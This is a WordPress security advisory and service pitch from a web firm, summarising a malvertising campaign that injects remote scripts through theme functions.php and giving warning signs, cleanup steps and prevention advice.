We’re seeing a malvertising campaign that quietly injects third-party scripts into WordPress sites. It looks like normal site code, but it redirects visitors, spawns pop-ups and can damage trust, SEO and conversions. Here’s what’s happening — and how to protect your business.

What’s going on

Attackers add a small snippet to a theme’s functions.php file. On each page load, it fetches JavaScript from attacker-controlled domains and prints it into the page head. Because it’s tucked into a theme function, it blends in with legitimate code and runs site-wide without obvious errors.

How the attack works (in plain English)

• Hidden hook: A harmless-looking function is attached to WordPress’s wp_head, so it executes for every visitor.
• Remote control: The function posts to a command-and-control server and echoes whatever script it gets back into your pages.
• Malvertising payload: The returned script loads additional code from traffic-distribution domains to trigger pop-ups and forced redirects.
• Stealth tactics: A 1×1 iframe mimics a legitimate CDN/verification script, and async settings help the malware avoid simple checks and performance tools.

Why this matters to your business

• Trust & brand: Pop-ups and redirects make your site feel unsafe — customers may not return.
• SEO impact: Search engines and browsers can warn or demote infected sites, cutting organic traffic.
• Revenue risk: Disrupted user journeys reduce enquiries and sales; recovery costs add up fast.
• Compliance: Serving malicious content to visitors’ devices can create complaints and obligations.

Warning signs

• Unexpected pop-ups, redirects or “verification” screens appearing for visitors.
• New or modified code at the end of your theme’s functions.php.
• Outbound requests to unfamiliar domains from page headers.
• Security tools flagging injected JavaScript or modified core/theme files.

Quick response

1. Shield traffic with a WAF: Put the site behind a web application firewall to block known bad requests while you clean. This adds a protective layer without changing your server.
2. Remove the injected code: Back up first, then delete the suspicious function from functions.php. Check child themes too.
3. Scan thoroughly: Use server-side scanning and file integrity checks to find other backdoors or injections. Follow with professional malware removal if needed.
4. Rotate credentials: Change WordPress, hosting, database and SFTP passwords; enable 2FA for all admins.
5. Audit outbound calls: Review logs and block malicious domains at your firewall.
6. Restore if required: If you have a clean backup, restore and immediately apply hardening and updates.

Prevention and ongoing protection

• Managed updates: Keep WordPress core, plugins and themes current. Managed WordPress maintenance reduces exposure from known vulnerabilities.
• Least-privilege access: Limit admin accounts, enforce strong unique passwords and 2FA.
• Security monitoring: Continuous monitoring alerts you to file changes, unauthorised scripts and policy violations early.
• Web application firewall (WAF): Filter attacks and add virtual patching to reduce exploit risk.
• Regular backups: Maintain automated, off-site backups for fast recovery after malware removal.
• Plugin & theme hygiene: Only use reputable sources; remove anything unused.

How matm can help

• Managed WordPress, plugin & theme updates
• Security monitoring and WAF setup
• Regular backups & fast site recovery
• Malware removal and emergency response

If you’ve spotted suspicious pop-ups, redirects or code changes, we can help you recover calmly and quickly — and strengthen your WordPress security for the long term. Email [email protected] or call 01952 883 526.

Based on research by Sucuri — read the original analysis.